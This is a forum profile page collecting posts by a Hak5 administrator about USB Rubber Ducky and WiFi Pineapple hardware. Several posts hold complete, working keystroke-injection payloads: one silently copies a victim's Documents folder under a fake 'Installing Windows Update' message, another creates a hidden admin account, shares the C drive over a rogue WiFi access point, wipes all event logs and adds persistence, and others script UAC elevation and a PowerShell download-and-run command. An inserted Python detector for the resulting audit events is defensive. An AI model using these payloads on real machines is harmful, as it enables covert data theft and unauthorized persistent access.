
Darren Kitchen (Root Admin)
Posts: 4,887 | Days Won: 248

Everything posted by Darren Kitchen

  1. I <3 TLAs. Also, what midnitesnake said. For hashdumping it's totally feasible, but when it comes to "backing up" a lot of data, an off-the-shelf USB drive is the way to go. Sure, we could re-engineer the duck to do USB3 speeds, but it would cost a metric buttload. Better off just using a 2nd thumbdrive.
  2. Tried to look up your order and see if we could send you a new board but I'm not finding anything from your d***gmail address. Hit us up. Nevermind, found your Ice W*** address. Board on its way to Manchester now. It should be blank so you can either serial flash it or, if you need to recover stuff off your existing board and are so adventurous, try to swap out the power regulator that's likely blown.
  3. I wanted to follow up with Overwraith's Ducky Slurp payload with one slightly more discreet and accurate. Tested successfully on Win7. If you haven't seen the Ducky Slurp payload yet check it out here: https://forums.hak5.org/index.php?/topic/29800-payload-duck-slurp-payload/?hl=slurp
     Basically this payload drops an invisible looping batch file on the target PC which waits for a USB drive labeled "DUCKY" to be inserted. Once the USB drive labeled "DUCKY" is inserted the file %duckyDRIVE%\DuckSlurp\DuckSlurp.bat is executed invisibly, which copies all of the data from %userprofile%\documents. Customize to your heart's content. Injection time is just a few seconds.
     REM Author: overwraith modified by dkitchen
     REM Name: DuckSlurp.txt
     REM Purpose: Run an executable file off of the SD card after it mounts.
     REM Uses googleknowsbests slightly more portable method to find the "Ducky" drive.
     REM Encoder V2.4
     REM Using the run command for a broader OS base.
     REM *** Initial Delay ***
     DELAY 2000
     REM *** Bypass UAC ***
     GUI r
     DELAY 250
     STRING powershell Start-Process cmd.exe -Verb runAs
     ENTER
     DELAY 1500
     ALT y
     DELAY 500
     REM *** Change directories because System32 appears to be protected. ***
     STRING CD %TEMP%
     ENTER
     REM *** Delete wait batch file if already exists ***
     STRING erase /Q DuckyWait.bat
     ENTER
     REM *** Make batch file that waits for SD card to mount. ***
     STRING copy con DuckyWait.bat
     ENTER
     STRING :while1
     ENTER
     STRING @echo off
     ENTER
     STRING :while1
     ENTER
     STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
     ENTER
     STRING if [%DUCKYdrive%] EQU [] (
     ENTER
     STRING timeout /t 3
     ENTER
     STRING goto :while1
     ENTER
     STRING ) else (
     ENTER
     STRING goto :break
     ENTER
     STRING )
     ENTER
     STRING timeout /t 3
     ENTER
     STRING goto :while1
     ENTER
     STRING :break
     ENTER
     STRING set DUCKYdrive=%DUCKYdrive%\DuckSlurp\
     ENTER
     STRING wscript.exe invis.vbs %DUCKYdrive%\DuckSlurp.bat
     ENTER
     CONTROL z
     ENTER
     REM *** Delete Invisible vbs file if already exists ***
     STRING erase /Q invis.vbs
     ENTER
     REM *** Make VBS file to run invisibly ***
     STRING copy con invis.vbs
     ENTER
     STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
     ENTER
     CONTROL Z
     ENTER
     REM *** Run the batch file invisibly ***
     STRING wscript.exe invis.vbs DuckyWait.bat
     ENTER
     REM *** Exit ***
     STRING EXIT
     ENTER
     Now make sure to label your USB drive "DUCKY" and create a folder on the root named "DuckSlurp". Within that folder create a batch file named "DuckSlurp.bat" containing the following:
     @echo off
     @echo Installing Windows Update
     set destination=%~d0\DuckSlurp\%COMPUTERNAME%
     mkdir %destination%
     if Exist %USERPROFILE%\Documents (
     xcopy %USERPROFILE%\Documents %destination% >>nul
     )
     @cls
     @exit
     The payload actually runs this batch file using the invis.vbs wscript so it shouldn't be seen on screen; however, if it were to be, it would simply state "Installing Windows Update" briefly.
  4. Well that's a use case we had not envisioned. The easiest solution is a normal usb drive, otherwise it's a bit of a hack. Perhaps a manual default gateway setting under network configuration would be useful.
  5. I do recall when developing duckyscript running into these key combos, but I can't recall the hex values. They weren't incorporated however that isn't to say they couldn't be added. If you open an inject.bin in a hex editor it'll start to make sense - modifier followed by key. 00 is no modifier. I believe the scancode for sleep is E0 5F or E0 3F. http://www.quadibloc.com/comp/scan.htm
  6. I wrote this to quickly and easily exfiltrate data from a target Windows 7 machine. It's successful in sharing data without setting off alarms by touching the network or mounting mass storage. This payload adds a hidden admin user with NTFS privs for the C drive, enables file and printer sharing, shares the C drive and creates a WiFi SoftAP on the target Windows 7 machine. Logs are cleaned on exit. It may be better suited for exfiltration as you only require physical access to the machine for 15-20 seconds; thereafter you only require WiFi proximity to download (or upload) files. Of course your target requires a wireless interface. I'm using a new UAC bypass and terminal obfuscation technique which could be applied to your payloads.
     Payload
     REM Payload: Exfiltration via WiFi SoftAP
     REM Target: Windows 7
     REM Author: Darren Kitchen
     REM *** Initial Delay ***
     DELAY 2000
     REM *** Bypass UAC ***
     GUI r
     DELAY 250
     STRING powershell Start-Process cmd.exe -Verb runAs
     ENTER
     DELAY 1500
     ALT y
     DELAY 500
     REM *** Make console light yellow on bright white and very tiny ***
     STRING color FE
     ENTER
     STRING mode con:cols=14 lines=1
     ENTER
     REM *** Add User techsupport ***
     STRING copy con techsupport.cmd
     ENTER
     STRING net User techsupport techsupport /ADD
     ENTER
     REM *** Add User techsupport to Admin Group ***
     STRING net LocalGroup Administrators techsupport /ADD
     ENTER
     REM *** Hide User techsupport ***
     STRING reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v techsupport /t REG_DWORD /d 0 /f
     ENTER
     REM *** Enable File and Printer Sharing ***
     STRING netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
     ENTER
     REM *** Share C Drive and grant techsupport NTFS privs ***
     STRING net share techsupport=c:\ /UNLIMITED
     ENTER
     STRING icacls c:\users\* /grant techsupport:(OI)(CI)F
     ENTER
     REM *** Bring up any WiFi Interfaces on the PC ***
     STRING netsh interface set interface name="Wireless Network Connection" admin=enabled
     ENTER
     STRING netsh interface set interface name="Wireless Network Connection 2" admin=enabled
     ENTER
     STRING netsh interface set interface name="Wireless Network Connection 3" admin=enabled
     ENTER
     REM *** Start software Wireless Access Point ***
     STRING netsh wlan set hostednetwork ssid=techsupport key=techsupport
     ENTER
     STRING netsh wlan start hostednetwork
     ENTER
     REM *** Clear log files and exit ***
     STRING for /f %x in ('wevtutil el') do wevtutil cl "%x"
     ENTER
     STRING exit
     ENTER
     CTRL z
     ENTER
     REM *** Run Payload and Minimize ***
     STRING techsupport.cmd
     ENTER
     ALT SPACE
     DELAY 100
     STRING n
     Usage
     After deploying the payload on the target Windows 7 PC, connect to the SoftAP from another machine (SSID techsupport, password techsupport) and browse to the C drive share (techsupport) with username techsupport and password techsupport.
     Post-Exploitation Cleanup
     From the C drive share over WiFi upload the following script to C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\cleanup.cmd
     del c:\windows\system32\techsupport.cmd
     net user techsupport /delete
     net share techsupport /delete
     for /f %x in ('wevtutil el') do wevtutil cl "%x"
     del "%~f0"
     Persistence
     Alternatively, if you would like the techsupport user, share and network to be available all of the time, consider adding the following script to C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\cleanup.cmd
     netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
     netsh interface set interface name="Wireless Network Connection" admin=enabled
     netsh interface set interface name="Wireless Network Connection 2" admin=enabled
     netsh interface set interface name="Wireless Network Connection 3" admin=enabled
     netsh wlan set hostednetwork ssid=techsupport key=techsupport
     netsh wlan start hostednetwork
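     The defender's view of the payload above, as an added example that is not part of Darren's post or any Hak5 code: each step it performs writes a Windows Security audit event (4720 account created, 4732 member added to a local group, 5142 share added, 1102 audit log cleared), and this Python snippet correlates those IDs in a forwarded log to flag the sequence. The pipe-separated line format and the sample lines are constructed for the example and are not a real Windows export.

```python
# Added example (not from the original post): correlate the Windows Security
# audit events that the SoftAP exfiltration payload above leaves behind.
# Event IDs are real Windows Security IDs; the log format and lines are
# constructed sample data for this example, not a real Windows export.
from datetime import datetime, timedelta

USER_CREATED = 4720     # A user account was created            (net user /ADD)
ADDED_TO_GROUP = 4732   # Member added to a local security group (net localgroup)
SHARE_ADDED = 5142      # A network share object was added       (net share)
LOG_CLEARED = 1102      # The audit log was cleared              (wevtutil cl)

# Constructed sample lines: "<ISO timestamp>|<event id>|key=value,..."
SAMPLE_LOG = r"""
2013-06-01T10:00:01|4624|user=alice,logon_type=2
2013-06-01T10:05:10|4720|target=techsupport,subject=alice
2013-06-01T10:05:11|4732|member=techsupport,group=Administrators
2013-06-01T10:05:12|5142|share=\\*\techsupport,path=C:\
2013-06-01T10:05:14|1102|subject=alice
2013-06-01T11:30:00|4720|target=svc_backup,subject=itadmin
"""


def parse_events(text):
    """Turn the pipe-separated sample format into dicts with a datetime and int id."""
    events = []
    for line in text.splitlines():
        parts = line.split("|", 2)
        if len(parts) != 3:
            continue  # blank or malformed line
        ts, eid, rest = parts
        fields = dict(kv.split("=", 1) for kv in rest.split(",") if "=" in kv)
        events.append({"time": datetime.fromisoformat(ts), "id": int(eid), **fields})
    return events


def find_staging(events, window=timedelta(minutes=2)):
    """One finding per created account; score counts how many of the payload's
    follow-on steps (admin group add, new share, log clear) occur within `window`."""
    findings = []
    for created in (e for e in events if e["id"] == USER_CREATED):
        account = created.get("target", "")
        deadline = created["time"] + window
        later = [e for e in events if created["time"] <= e["time"] <= deadline]
        steps = {
            "admin": any(e["id"] == ADDED_TO_GROUP and e.get("member") == account
                         and e.get("group") == "Administrators" for e in later),
            "share": any(e["id"] == SHARE_ADDED for e in later),
            "log_cleared": any(e["id"] == LOG_CLEARED for e in later),
        }
        score = sum(steps.values())
        if score:  # a lone account creation is routine; any follow-on step is worth a look
            findings.append({"account": account, "created": created["time"].isoformat(),
                             "steps": steps, "score": score})
    return findings


if __name__ == "__main__":
    for f in find_staging(parse_events(SAMPLE_LOG)):
        print(f"{f['account']}: {f['score']}/3 payload steps within window -> {f['steps']}")
```

     Because the payload's last step clears every log, the 4720/4732/5142 events survive only on a collector (Windows Event Forwarding or a SIEM) the host ships to; on the host itself the 1102 entry written after the clear is usually the only trace.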
  7. BITSADMIN version 3.0 [ 7.5.7601 ]
     BITS administration utility.
     (C) Copyright 2000-2006 Microsoft Corp.
     BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
     Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
     Which is why....
     powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%temp%\bob.exe'); Start-Process "%temp%\bob.exe"
     However cool, it still doesn't open a command prompt bypassing UAC.
  8. The duck is pretty good at bypassing UAC. Let's make it better.
     REM *********************************
     REM Payload: Old Method to Bypass UAC
     REM Target: Window 7
     REM Author: Darren Kitchen
     REM *********************************
     GUI
     DELAY 500
     STRING cmd
     DELAY 3000
     MENU
     DELAY 2000
     STRING a
     REM *************************************************************
     REM Depending on Windows Version an ENTER could be necessary here
     REM *************************************************************
     DELAY 3000
     LEFT
     ENTER
     DELAY 500
     STRING echo Admin Prompt in 9 seconds
     Not bad. Let's shave another 2 seconds off...
     REM ********************************
     REM Payload: Less Finicky UAC Bypass
     REM Target: Window 7
     REM Author: Darren Kitchen
     REM ********************************
     GUI r
     DELAY 500
     STRING cmd
     ENTER
     DELAY 500
     STRING copy con sudo.cmd
     ENTER
     STRING @echo Set objShell = CreateObject("Shell.Application") > %temp%\sudo.tmp.vbs
     ENTER
     STRING @echo args = Right("%*", (Len("%*") - Len("%1"))) >> %temp%\sudo.tmp.vbs
     ENTER
     STRING @echo objShell.ShellExecute "%1", args, "", "runas" >> %temp%\sudo.tmp.vbs
     ENTER
     STRING @cscript %temp%\sudo.tmp.vbs
     ENTER
     CTRL z
     ENTER
     STRING sudo.cmd cmd
     ENTER
     DELAY 3000
     ALT y
     DELAY 500
     STRING echo Admin Prompt in 7 seconds
     Not bad. Let's shave another 2 seconds off...
     REM ********************************************
     REM Payload: Fastest UAC Bypass using Powershell
     REM Target: Window 7
     REM Author: Darren Kitchen
     REM ********************************************
     GUI r
     DELAY 500
     STRING powershell Start-Process cmd -Verb runAs
     ENTER
     DELAY 3000
     ALT y
     DELAY 500
     STRING echo Admin Prompt in 5 seconds
     Not bad. Let's shave another 2 seconds off...? Thoughts?
  9. I'd figure the scenario in which USB3 is required is exfiltration of a large amount of data in a short amount of time. If this is the case the agent may be better suited armed with both a ducky and a fast USB 3.0 drive of ample capacity.
  10. Sweet script! Did you try out the Simple Ducky Payload Generator? https://forums.hak5.org/index.php?/topic/28969-release-simple-ducky-payload-generator-v111-international-key-mappingkali-compatiblecustom-payload-builder/ I'm not sure if it uses the same technique but it's another great resource.
  11. One of the trade-offs in usability and cost as the hardware platform has evolved was going from the expensive metal swing door (which sometimes popped open!) to a much more cost efficient microSD slot. The board is also as thin as it is so the whole package will fit inside the inconspicuous looking case. While the spring-loaded card slot would have been more convenient it would not have fit. If you can't get it with your fingernails try a pair of pliers or tweezers and the card slot will loosen up after just a few uses.
  12. Is there a requirement for USB3 transfer speed that would warrant the extreme cost?
  13. 3.0.0 or 2.8.1? I'm not seeing a config file for your particular modem in /etc/usb_modeswitch.d on the former. What model Huawei? You shouldn't have a wan2 network on 2.x until after dialing and on 3.x it's blank until you fill in the details from network > mobile broadband.
  14. T-Mobile, the carrier in the US who does not require ID and happily accepts cash, will soon introduce a new LTE modem. Until then they only offer phones and "personal hotspots". Of course most unlocked HSDPA modems should take their SIM cards and work with the pineapple no problem, granted you have the proper dialing information. Since v3 the MK4 supports about 300 modems. I've had success with unlocked HSDPA modems from Huawei and ZTE. Just keep in mind the faster LTE modems require a lot of juice (usually above and beyond spec) so you'll probably need either a powered hub or a powered USB Y-cable. Personally I'm a fan of the cheap Android "burner" phone since it works out of the box without any configuration on the pineapple and has its own battery - but as you've pointed out there are plenty of options.
  15. Join Team Jasager for this Firmware version 3.0 launch hangout! Today @ 3:30 PT https://plus.google.com/u/0/events/ctuepcgghf18rgm9eid860b7e0g Will update with recorded clip after the event. Join irc.hak5.org #hak5 for Q&A.
  16. Wow this is fantastic! 411 - emailed you.
  17. Can you provide additional information on the device? I've tested with Android 4.1.2 and 4.2.2 and all seems to be fine.
      Karma Log
      43449 a0:0b:ba:xx:xx:xx 172.16.42.248 * 01:a0:0b:ba:xx:xx:xx
      43407 2c:9e:fc:xx:xx:xx 172.16.42.172 * 01:2c:9e:fc:xx:xx:xx
      43357 38:aa:3c:xx:xx:xx 172.16.42.115 android-xxx 01:38:aa:3c:xx:xx:xx
      IP address     HW type  Flags  HW address         Mask  Device
      172.16.42.248  0x1      0x2    a0:0b:ba:xx:xx:xx  *     br-lan
      172.16.42.115  0x1      0x2    38:aa:3c:xx:xx:xx  *     br-lan
      172.16.42.42   0x1      0x2    54:53:ed:xx:xx:xx  *     br-lan
      172.16.42.172  0x1      0x2    2c:9e:fc:xx:xx:xx  *     br-lan
      KARMA: Probe Request from 00:23:32:xx:xx:xx for SSID 'Baltic Joint Netswerk'
      KARMA: Successful association of a0:0b:ba:xx:xx:xx
      KARMA: Checking SSID for start of association, pass through poke
      KARMA: Probe Request from a0:0b:ba:xx:xx:xx for SSID 'poke'
      KARMA: Probe Request from a0:0b:ba:xx:xx:xx for SSID 'sayumi-N'
      KARMA: Successful association of 2c:9e:fc:xx:xx:xx
      KARMA: Checking SSID for start of association, pass through BJNPSETUP
      KARMA: Successful association of 38:aa:3c:xx:xx:xx
      KARMA: Checking SSID for start of association, pass through igotpwned
      KARMA: Probe Request from 38:aa:3c:xx:xx:xx for SSID 'igotpwned'
      KARMA: Probe Request from 38:aa:3c:xx:xx:xx for SSID 'Looxcie_01073A'
      KARMA: Probe Request from c4:85:08:xx:xx:xx for SSID 'sayumi-N'
      KARMA: Probe Request from 2c:9e:fc:xx:xx:xx for SSID 'BJNPSETUP'
      KARMA: ENABLED
      00:02:37 Pineapple daemon.info dnsmasq-dhcp[1443]: DHCPREQUEST(br-lan) 172.16.42.115 38:aa:3c:xx:xx:xx
      00:02:37 Pineapple daemon.info dnsmasq-dhcp[1443]: DHCPOFFER(br-lan) 172.16.42.115 38:aa:3c:xx:xx:xx
      00:02:37 Pineapple daemon.info dnsmasq-dhcp[1443]: DHCPDISCOVER(br-lan) 38:aa:3c:xx:xx:xx
      00:02:37 Pineapple daemon.info dnsmasq-dhcp[1443]: DHCPACK(br-lan) 172.16.42.115 38:aa:3c:xx:xx:xx android-xxx
      00:02:33 Pineapple daemon.info hostapd: wlan0: STA 38:aa:3c:xx:xx:xx IEEE 802.11: authenticated
      00:02:33 Pineapple daemon.info hostapd: wlan0: STA 38:aa:3c:xx:xx:xx IEEE 802.11: associated (aid 1)
  18. What you want to see is something like this:
      Jan 1 00:02:21 Pineapple daemon.notice pppd[2362]: pppd 2.4.5 started by root, uid 0
      Jan 1 00:02:22 Pineapple local2.info chat[2366]: abort on (BUSY)
      Jan 1 00:02:22 Pineapple local2.info chat[2366]: abort on (NO CARRIER)
      Jan 1 00:02:22 Pineapple local2.info chat[2366]: abort on (ERROR)
      Jan 1 00:02:22 Pineapple local2.info chat[2366]: abort on (NO DIAL TONE)
      Jan 1 00:02:22 Pineapple local2.info chat[2366]: abort on (NO ANSWER)
      Jan 1 00:02:22 Pineapple local2.info chat[2366]: abort on (DELAYED)
      Jan 1 00:02:22 Pineapple local2.info chat[2366]: report (CONNECT)
      Jan 1 00:02:22 Pineapple local2.info chat[2366]: timeout set to 10 seconds
      Jan 1 00:02:22 Pineapple local2.info chat[2366]: send (AT^M)
      Jan 1 00:02:22 Pineapple local2.info chat[2366]: expect (OK)
      Jan 1 00:02:22 Pineapple local2.info chat[2366]: AT^M^M
      Jan 1 00:02:22 Pineapple local2.info chat[2366]: OK
      Jan 1 00:02:22 Pineapple local2.info chat[2366]: -- got it
      Jan 1 00:02:22 Pineapple local2.info chat[2366]: send (ATZ^M)
      Jan 1 00:02:23 Pineapple local2.info chat[2366]: timeout set to 30 seconds
      Jan 1 00:02:23 Pineapple local2.info chat[2366]: expect (OK)
      Jan 1 00:02:23 Pineapple local2.info chat[2366]: ^M
      Jan 1 00:02:23 Pineapple local2.info chat[2366]: ATZ^M^M
      Jan 1 00:02:23 Pineapple local2.info chat[2366]: OK
      Jan 1 00:02:23 Pineapple local2.info chat[2366]: -- got it
      Jan 1 00:02:23 Pineapple local2.info chat[2366]: send (ATDT#777^M)
      Jan 1 00:02:23 Pineapple local2.info chat[2366]: expect (CONNECT)
      Jan 1 00:02:23 Pineapple local2.info chat[2366]: ^M
      Jan 1 00:02:26 Pineapple local2.info chat[2366]: ATDT#777^M^M
      Jan 1 00:02:26 Pineapple local2.info chat[2366]: CONNECT
      Jan 1 00:02:26 Pineapple local2.info chat[2366]: -- got it
      Jan 1 00:02:26 Pineapple local2.info chat[2366]: send (^M)
      Jan 1 00:02:26 Pineapple daemon.info pppd[2362]: Serial connection established.
      Jan 1 00:02:26 Pineapple daemon.info pppd[2362]: Using interface 3g-wan2
      Jan 1 00:02:26 Pineapple daemon.notice pppd[2362]: Connect: 3g-wan2 <--> /dev/ttyUSB0
      Jan 1 00:02:26 Pineapple daemon.info dnsmasq[1391]: reading /tmp/resolv.conf.auto
      Jan 1 00:02:26 Pineapple daemon.info dnsmasq[1391]: using nameserver 8.8.8.8#53
      Jan 1 00:02:26 Pineapple daemon.info dnsmasq[1391]: using local addresses only for domain lan
      Jan 1 00:02:27 Pineapple daemon.notice pppd[2362]: local IP address 99.204.xxx.xxx
      Jan 1 00:02:27 Pineapple daemon.notice pppd[2362]: remote IP address 66.1.xxx.xxx
      Jan 1 00:02:27 Pineapple daemon.notice pppd[2362]: primary DNS address 66.xxx.xxx.xxx
      Jan 1 00:02:27 Pineapple daemon.notice pppd[2362]: secondary DNS address 68.xxx.xxx.xxx
      Jan 1 00:02:27 Pineapple daemon.notice netifd: Interface 'wan2' is now up
      Jan 1 00:02:28 Pineapple user.notice ifup: Enabling Router Solicitations on wan2 (3g-wan2)
      Jan 1 00:02:29 Pineapple user.notice root: ifup 3g-wan2
      It looks like your modem has successfully modeswitched. What are the outputs of lsusb, ls /dev/tty* and cat /etc/ppp/options?
  19. Can you ping it? What are the results of ifconfig -a and netstat -r ?
  20. 1. Atheros is the only wifi vendor with open source drivers. As such the modified Karma hostapd drivers are written for this hardware. Ath5k or ath9k should work. Previously the pineapple was on the AR2315 chipset, for example.
      2. I've gotten it working, albeit stripped down, on TP-Link hardware. It worked but the low memory and weak antenna were limiting. Also it's not FCC certified, so if you're using it in the United States it isn't exactly legal. The AP121U is. I don't know of any other hardware in its class.
      3. The most popular bootloader for this type of device is uboot. Another is redboot. Both support flashing over Ethernet, though the former is typically not configured as such. Any cheap UART / TTL will work - just keep voltages in mind. The ALFA dev board is nice, but not necessary for most.
      Whatever wifi hardware you go with, keep in mind the inherent limitations of the chipset as far as transmit power is concerned. You're really going to want a high gain antenna attached. 9 dBi is a good place to start. Google the relationship between dBm power, dBi gain and EIRP and it should all make sense.
      Good luck! When I first started playing with pineapples I knew only basic Linux and embedded hardware. It's really a fulfilling project to take on.
      Cheers, Darren
  21. Good call thesugarat. I just picked up that unit and it works quite well. Unfortunately it is expensive and I've been unable to source a supplier - as of yet. I'll keep on it. While the versatile power regulator on the mk4 has been convenient, accepting anywhere between 5v and 14v, it has become apparent how under very heavy load a higher voltage is required. While for basic usage the 5v adapter will suffice, I am continuing to look for a suitable 5/9/12v battery pack.